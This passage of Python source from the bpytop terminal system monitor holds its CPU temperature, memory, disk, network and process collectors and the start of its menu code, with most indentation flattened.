else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
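					#* Ryzen exposes one Tccd sensor per chiplet, so each CCD temperature is spread
					#* over the cores/threads belonging to that CCD using CORE_MAP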
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
	'''Collects memory and disk information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
disks_io_dict: Dict[str, Dict[str, List[int]]] = {}
recheck_diskutil: bool = True
diskutil_map: Dict[str, str] = {}
io_error: bool = False
old_disks: List[str] = []
old_io_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string_r: str
io_string_w: str
u_percent: int
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if SYSTEM == "MacOS" and cls.recheck_diskutil:
cls.recheck_diskutil = False
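			#* Map each physical disk from "diskutil list physical" to its APFS container name so that
			#* io_counters (keyed by the physical device) can be matched to the mounted container volumes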
try:
dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
for line in dutil_out.split("\n"):
line = line.replace("\u2068", "").replace("\u2069", "")
if line.startswith("/dev/"):
xdisk = line.split()[0].replace("/dev/", "")
elif "Container" in line:
ydisk = line.split()[3]
if xdisk and ydisk:
cls.diskutil_map[xdisk] = ydisk
xdisk = ydisk = ""
except:
pass
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string_r = io_string_w = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(getattr(disk_u, "percent", 0))
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM != "BSD":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if not dev_name in io_counters:
for names in io_counters:
if names in dev_name:
disk_io = io_counters[names]
break
else:
if cls.diskutil_map:
for names, items in cls.diskutil_map.items():
if items in dev_name and names in io_counters:
disk_io = io_counters[names]
else:
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
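					#* Read/write speed in bytes per second from the delta against disk_hist since the last
					#* collection; shifted down to MiB (>> 20) before being appended to the io graph lists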
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
if not disk.device in cls.disks_io_dict:
cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if CONFIG.io_mode or MemBox.disks_width > 30:
if disk_read > 0:
io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
if disk_write > 0:
io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
if CONFIG.io_mode:
cls.disks[disk.device]["io_r"] = io_string_r
cls.disks[disk.device]["io_w"] = io_string_w
elif disk_read + disk_write > 0:
io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
MemBox.redraw = True
cls.recheck_diskutil = True
cls.old_disks = list(cls.disks)
cls.old_io_disks = list(cls.disks_io_dict)
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
	#* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_lower] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
address: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
if cls.nic in psutil.net_if_addrs():
cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
case_sensitive: bool = False
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
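	#* Pre-compiled eval() expressions used as sort keys for psutil.process_iter(); missing fields
	#* come back as the ad_value 0.0, which the expressions guard against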
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
		'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: List[str] = []
if cls.search_filter:
if cls.case_sensitive:
search = [i.strip() for i in cls.search_filter.split(",")]
else:
search = [i.strip() for i in cls.search_filter.lower().split(",")]
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
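				#* Scale small memory percentages up non-linearly so the detailed mini graph stays visible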
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
		'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
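		#* Recursive tree builder: when a branch is collapsed (or deeper than tree_depth) the children's
		#* threads, memory and cpu values are summed into the collapsed parent via collapse_to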
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
